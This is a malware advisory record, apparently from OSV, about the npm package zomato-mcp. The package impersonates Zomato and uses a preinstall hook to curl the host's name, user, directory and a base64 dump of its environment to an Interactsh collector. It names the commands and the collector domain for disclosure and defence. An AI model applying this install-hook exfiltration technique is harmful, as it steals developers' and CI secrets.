zomato-mcp @1.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-6270
Ecosystem
npm
Summary
On npm install , the package's preinstall lifecycle script runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/install/<base64(zomato-mcp)> carrying the installer's hostname -f , whoami , current working directory, and a base64-encoded dump of the entire process environment ( env | base64 -w0 ). This fires automatically with no user consent and over plain HTTP. A preuninstall hook similarly leaks the hostname. The oast.site domain is an Interactsh out-of-band collector, used to receive arbitrary attacker-controlled callbacks. The package's advertised functionality is absent: index.js is a 59-byte stub ( module.exports = { name: 'zomato-mcp', version: '1.0.0' }; ), with no MCP server implementation. Combined with the Zomato-namespace impersonation, this is a dependency-confusion / typosquat attack whose only real behavior is install-time recon and credential exfiltration of the entire shell environment (which routinely contains API tokens, CI secrets, cloud credentials, and registry auth tokens).
Source: amazon-inspector (a23c3c63a9064636250be7dffa3781af0f9cdfcfd11a8da875be470c6952033e)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.